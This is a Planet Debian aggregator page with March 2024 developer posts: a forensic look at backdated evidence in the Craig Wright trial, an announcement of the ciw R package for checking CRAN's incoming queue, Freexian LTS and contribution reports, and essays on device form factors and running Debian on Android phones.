Planet Debian

Planet Debian - https://planet.debian.org/

Patryk Cisek: OpenPGP Paper Backup

Fri, 2024-03-15 17:42
I’ve been using OpenPGP through GnuPG since the early 2000s. It’s an essential part of a Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important. Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a small set of flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.
Categories: FLOSS Project Planets

Gregor Herrmann: teamwork in practice

Thu, 2024-03-14 18:10

teamwork, or: why I love the Debian Perl Group:

elbrus introduced a (very untypical) package into the Debian Perl Group in 2022.

after changes of the default compiler options (-Werror=implicit-function-declaration) in debian, it didn't build any more & received an RC bug.

because I sometimes like challenges, I had a look at it & cobbled together a patch. as I hardly speak any C, I sent my notes to the bug report & (implicitly) asked for help. – & went out to meet a friend.

when I came home, I found an email from ntyni, sent less than 2 hours after my mail, where he kindly pointed out the issues with my patch – & sent a corrected version.

all I needed to do was to adjust the patch & upload the package. one more bug fixed, one less task for us, & elbrus can concentrate on more important tasks :)
thanks again, niko!

Categories: FLOSS Project Planets

Matthew Garrett: Digital forgeries are hard

Thu, 2024-03-14 05:11
Closing arguments in the trial between various people and Craig Wright over whether he's Satoshi Nakamoto are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for both sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.

One of the pieces of evidence entered is screenshots of data from Mind Your Own Business, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled a meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.

One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the database in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.

This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.

And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This timestamp was created by the client, so it is consistent with the email having been sent in 2024, rather than being sent in 2019 and somehow getting stuck somewhere before delivery. The Date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.
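
As a rough illustration of the kind of cross-check involved (a minimal sketch, not the experts' actual tooling; the filename is hypothetical), Python's standard email module can pull out the claimed Date header alongside the per-part headers where clients record their own timestamps:

# Minimal sketch: compare an email's claimed Date header against other
# timestamps carried in the message. "disputed.eml" is a hypothetical
# filename; this shows the general idea, not the tooling used in the case.
from email import policy
from email.parser import BytesParser
from email.utils import parsedate_to_datetime

with open("disputed.eml", "rb") as f:
    msg = BytesParser(policy=policy.default).parse(f)

print("Claimed Date header:", parsedate_to_datetime(msg["Date"]))

# Attachments can carry client-generated metadata of their own, e.g.
# creation-date/modification-date parameters in Content-Disposition.
for part in msg.walk():
    disposition = part.get("Content-Disposition")
    if disposition:
        print(part.get_content_type(), "->", disposition)

Any disagreement between these layers is exactly the sort of inconsistency the experts were looking for.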

But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.

This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.
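
Reading such metadata takes only a few lines; for instance, with the third-party pypdf package (a sketch with a hypothetical filename; metadata can of course itself be edited, which is the whole point of the surrounding analysis):

# Sketch: inspect what a PDF claims about its own origin, using the
# third-party pypdf package. The filename is hypothetical.
from pypdf import PdfReader

meta = PdfReader("whitepaper.pdf").metadata
# A LaTeX-produced PDF typically reports pdfTeX as its producer, while
# an OpenOffice export reports OpenOffice/StarOffice.
print("Producer:", meta.producer)
print("Creator: ", meta.creator)
print("Created: ", meta.creation_date)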

Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.

(References: this Dropbox, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")

Categories: FLOSS Project Planets

Dirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Wed, 2024-03-13 20:03

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release.

For example, when I do this right now as I type this, I see

edd@rob:~$ ciw.r
    Folder                   Name                Time   Size        Age
    <char>                 <char>              <POSc> <char> <difftime>
1: waiting   maximin_1.0-5.tar.gz 2024-03-13 22:22:00    20K   2.48 hours
2: inspect    GofCens_0.97.tar.gz 2024-03-13 21:12:00    29K   3.65 hours
3: inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00    79K   4.70 hours
4: waiting    rnames_1.0.1.tar.gz 2024-03-12 15:04:00   2.7K  33.78 hours
5: waiting  PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00   406K  84.32 hours
6: pending        MPCR_1.1.tar.gz 2024-02-22 11:07:00   903K 493.73 hours
edd@rob:~$

which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do it from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of ‘can I haz networking?’ to speed things up. The check adds another 200ms or so.)
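
For readers without R at hand: the data behind incoming() is just the public directory listing at https://cran.r-project.org/incoming/. A rough Python approximation of the collection step (a sketch, not the package's actual implementation, and it assumes the listing is a plain HTML index):

# Rough sketch of what ciw's incoming() collects: scrape the public
# CRAN incoming listing for tarballs in a few folders. This is an
# approximation for illustration, not the package's implementation.
import re
import urllib.request

BASE = "https://cran.r-project.org/incoming/"

def list_folder(folder):
    with urllib.request.urlopen(BASE + folder + "/") as resp:
        html = resp.read().decode("utf-8", errors="replace")
    # crude scrape of the HTML index for package tarballs
    return re.findall(r'href="([^"]+\.tar\.gz)"', html)

for folder in ("inspect", "waiting", "pending"):
    for tarball in list_folder(folder):
        print(f"{folder:8} {tarball}")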

The function (and the wrapper) offer a ton of options too; this is ridiculously easy to do thanks to the docopt package:

edd@rob:~$ ciw.r -x
Usage: ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]

-m --mega         use 'mega' mode of all folders (see --usage)
-i --inspect      visit 'inspect' folder
-t --pretest      visit 'pretest' folder
-p --pending      visit 'pending' folder
-w --waiting      visit 'waiting' folder
-r --recheck      visit 'recheck' folder
-a --archive      visit 'archive' folder
-n --newbies      visit 'newbies' folder
-u --publish      visit 'publish' folder
-s --skipsort     skip sorting of aggregate results by age
-l --lines rows   print top 'rows' of the result object [default: 50]
-z --ping         run the connectivity check first
-h --help         show this help text
-x --usage        show help and short example usage

where ARG... can be one or more file names, directories, or package names.

Examples:
  ciw.r -ip    # run in 'inspect' and 'pending' mode
  ciw.r -a     # run with mode 'auto' resolved in incoming()
  ciw.r        # run with defaults, same as '-itpwr'

When no argument is given, 'auto' is selected, which corresponds to 'inspect',
'waiting', 'pending', 'pretest', and 'recheck'. Selecting '-m' or '--mega'
selects all folders. Folder-selecting arguments are cumulative; but 'mega' is
a single selection of all folders (i.e. 'inspect', 'waiting', 'pending',
'pretest', 'recheck', 'archive', 'newbies', 'publish').

ciw.r is part of littler which brings 'r' to the command-line.
See https://dirk.eddelbuettel.com/code/littler.html for more information.
edd@rob:~$
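
The same approach exists in Python, where the docopt package likewise turns the help text itself into the parser. A minimal sketch mirroring a few of ciw.r's flags (ciw.py is a hypothetical name; requires the third-party docopt package):

"""Minimal docopt sketch mirroring a few of ciw.r's flags.

Usage:
  ciw.py [-i] [-p] [-w] [-l ROWS]

Options:
  -i --inspect          visit 'inspect' folder
  -p --pending          visit 'pending' folder
  -w --waiting          visit 'waiting' folder
  -l ROWS --lines ROWS  print top ROWS of the result [default: 50]
"""
from docopt import docopt  # third-party: pip install docopt

if __name__ == "__main__":
    # docopt parses sys.argv against the usage text above and returns a
    # dict like {'--inspect': True, '--lines': '50', ...}
    print(docopt(__doc__))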

The README at the git repo and the CRAN page offer a ‘screenshot movie’ showing some of the options in action.

I have been using the little tool quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that, again a big Thank You! of appreciation for all that CRAN does—which this week included letting this pass the newbies desk in under 24 hours.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Categories: FLOSS Project Planets

Freexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)

Wed, 2024-03-13 20:00

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian LTS contributors

In February, 18 contributors were paid to work on Debian LTS; their reports are available:

  • Abhijith PA did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.
  • Adrian Bunk did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.
  • Bastien Roucariès did 20.0h (out of 20.0h assigned).
  • Ben Hutchings did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 10.0h (out of 10.0h assigned).
  • Emilio Pozuelo Monfort did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.
  • Guilhem Moulin did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.
  • Holger Levsen did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.
  • Lee Garrett did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.
  • Santiago Ruano Rincón did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.
  • Sean Whitton did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.
  • Sylvain Beucler did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.
  • Thorsten Alteholz did 14.0h (out of 14.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).
  • Utkarsh Gupta did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75h to the next month.
Evolution of the situation

In February, we have released 17 DLAs.

The number of DLAs published during February was a bit lower than usual, as much work went into triaging CVEs (a number of which turned out not to affect Debian buster, while others ended up being duplicates or were otherwise determined to be invalid). Of the packages which did receive updates, notable were sudo (to fix a privilege management issue), and iwd and wpa (both of which suffered from authentication bypass vulnerabilities).

While this has already been announced in the Freexian blog, we would like to mention here the start of the Long Term Support project for Samba 4.17. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, Catalyst, towards improving the security support of Samba in Debian 12 (Bookworm).

Thanks to our sponsors

Sponsors that joined recently are in bold.

Categories: FLOSS Project Planets

Russell Coker: The Shape of Computers

Wed, 2024-03-13 08:16
Introduction

There have been many experiments with the sizes of computers, some of which have stayed around and some of which have gone away. The trend has been to make computers smaller; the earliest computers needed entire buildings. Recently, for some classes of computers, they have become as small as could reasonably be desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.

This means that further development in the size and shape of computers will largely be determined by human factors.

I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.

Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.

Desktop/Laptop PCs

When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand for multiple options for a light keyboard that can be moved for convenience, combined with multiple options for the box part. But it still pops up occasionally, such as the Raspberry Pi 400 [1], which succeeds due to the computer part being small and light. I think this type of computer will remain a niche product. It could be used in an “add a screen to make a laptop” model as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.

The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.

The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].

The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter, which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry, and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard, which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens, so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one; prices are as low as $600US.

I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.

We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.

The Interesting New Things

Watch Like

The wrist-watch [4] has been a standard format for easy access to data when on the go since its military use at the end of the 19th century, when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the foreseeable future. For comparison, smart phones have been in widespread use as “pocket watches” for about 10 years.

The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?

Phone Like

Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.

Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.

Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.

The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.

Laptop Like

One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.

The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.

Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.

Useful Hardware for Developing These Things

I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.

The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.

The PinePhonePro is an OK phone made to open standards but its hardware isn't as good as Android phones released in the same year [17]. I've got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it's even slower than the PinePhonePro. These are good devices for testing and development but not ones that many people would be excited to use every day.

Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.

What We Must Do

Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it's to be used. This would be a good thing to document; I spent 15 minutes looking at it and couldn't get it going.
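
For anyone who wants a starting point, the pocketsphinx Python bindings (a separate package from the Debian CLI tools) have historically offered a very small API for live recognition. This is a sketch based on the 0.1.x-era bindings and should be treated as an assumption to verify against whichever version is installed:

# Hedged sketch of the pocketsphinx Python bindings (0.1.x-era API);
# verify against the installed version, as the API has changed between
# releases. LiveSpeech reads from the default microphone and yields
# decoded utterances using the bundled US English model.
from pocketsphinx import LiveSpeech

for phrase in LiveSpeech():
    print(phrase)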

To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.

Support for changing screen resolution is already there, as is support for touch screens. Support for adapting the GUI to a changed screen size is something that needs to be done – even today's hardware of connecting a small laptop to an external monitor doesn't have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens; I haven't investigated this properly yet, but it definitely doesn't work in an expected manner in Ubuntu 22.04 and I haven't yet tested the combinations on Debian/Unstable.

ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.

Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability, and while Android is usable for its own special apps it's not usable in a “I want to run applications that use any files from any other applications in any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality, which has the potential to be a bug, and the emerging class of LLM based attacks.

I will write more posts about these things.

Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Categories: FLOSS Project Planets

Freexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Tue, 2024-03-12 20:00

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne

Much of the work was spent on handling interaction with the time64 transition and sending patches to mitigate fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rincón

Last month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (e.g. krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some large C/C++ projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache work.

Finally, Santiago changed the chroot mode, and now has a couple of POCs (cf. 1 and 2) that rely on schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!

The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache it used, and a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.

Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in Salsa CI's own CI.

Packaging simplemonitor, by Carles Pina i Estany

Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.

During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.

Carles also started upgrading or improving some of simplemonitor’s dependencies.

Miscellaneous contributions
  • Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
  • Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
  • DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
  • Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
  • A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
  • Enrico participated in /usr-merge discussions with Helmut.
  • Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
  • Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
  • Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
  • Helmut sent patches for 48 cross build failures.
  • Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
  • Helmut sent a debci MR for improving collector robustness.
  • In preparation for DebConf 25, Santiago worked on the Brest Bid.
Categories: FLOSS Project Planets

Russell Coker: Android vs FOSS Phones

Tue, 2024-03-12 06:35

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a bit bigger than the 4G of RAM that's in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period, so it's not a bad SoC, but it doesn't compare well to more recent Android devices and it also isn't a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life, so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.

PostmarketOS

One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered; the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiaomi POCO F1 which doesn’t appear to be available on ebay.

LineageOS

The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone                     RAM    External Display  Price
Edge 20 Pro [5]           6-12G  HDMI              $500 (not many on sale)
Edge S aka moto G100 [6]  6-8G   HDMI              $500 to $600+
Fairphone 4               6-8G   USBC-DP           $1000+
Nubia Red Magic 5G        8-16G  USBC-DP           $600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren't in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers; until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.

Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.

IP Laws and Practices

Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.

Droidian and Buying a Note 9

FOSDEM 2023 had a lecture about the Droidian project, which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It's interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].

Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is €452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone             RAM    Price         Issues
Note 9 128G/512G  6G/8G  <$300         Not supporting external display
Galaxy S9+        6G     <$300         Not supporting external display
Xperia 5          6G     >$300         Hotspot partly working
OnePlus 3T        6G     $200 – $400+  Photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.

Mobian

I should have checked the Mobian list first as it’s the main Debian variant for phones.

